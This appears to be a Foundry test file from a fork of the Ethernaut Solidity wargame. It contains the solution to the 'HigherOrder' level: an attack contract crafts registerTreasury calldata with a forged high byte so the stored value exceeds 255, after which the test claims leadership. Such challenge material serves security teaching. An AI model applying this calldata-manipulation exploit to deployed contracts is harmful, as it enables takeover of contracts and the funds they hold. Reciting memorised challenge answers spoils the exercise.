ethernaut/contracts/test/levels/HigherOrder.t.sol at master · ChipKlutzy/ethernaut · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import {Utils} from "test/utils/Utils.sol";

import {DummyFactory} from "src/levels/DummyFactory.sol";
import {Level} from "src/levels/base/Level.sol";
import {Ethernaut} from "src/Ethernaut.sol";

interface HigherOrder {
    function claimLeadership() external;
    function registerTreasury(bytes32) external;
}

contract HigherOrderAttack {
    function encodedData() public pure returns (bytes memory) {
        return abi.encodeWithSignature("registerTreasury(uint8)", uint8(42));
    }

    function injectedData() public pure returns (bytes memory) {
        bytes memory data = encodedData();
        data[21] = hex"FF";
        return data;
    }

    function attack(address victim) public {
        (bool response,) = address(victim).call(injectedData());
        if (!response) revert();
    }
}

contract TestHigherOrder is Test, Utils {
    Ethernaut ethernaut;
    HigherOrder instance;

    address payable owner;
    address payable player;

    /*//////////////////////////////////////////////////////////////
                                 HELPERS
    //////////////////////////////////////////////////////////////*/

    function setUp() public {
        address payable[] memory users = createUsers(2);

        owner = users[0];
        vm.label(owner, "Owner");

        player = users[1];
        vm.label(player, "Player");

        vm.startPrank(owner);
        ethernaut = getEthernautWithStatsProxy(owner);
        DummyFactory factory = DummyFactory(getOldFactory("HigherOrderFactory"));
        ethernaut.registerLevel(Level(address(factory)));
        vm.stopPrank();

        vm.startPrank(player);
        instance = HigherOrder(payable(createLevelInstance(ethernaut, Level(address(factory)), 0)));
        vm.stopPrank();
    }

    /*//////////////////////////////////////////////////////////////
                                 TESTS
    //////////////////////////////////////////////////////////////*/

    /// @notice Check the intial state of the level and enviroment.
    function testInit() public {
        vm.startPrank(player);
        assertFalse(submitLevelInstance(ethernaut, address(instance)));
    }

    /// @notice Test the solution for the level.
    function testSolve() public {
        vm.startPrank(player, player);

        new HigherOrderAttack().attack(address(instance));
        instance.claimLeadership();

        assertTrue(submitLevelInstance(ethernaut, address(instance)));
    }
}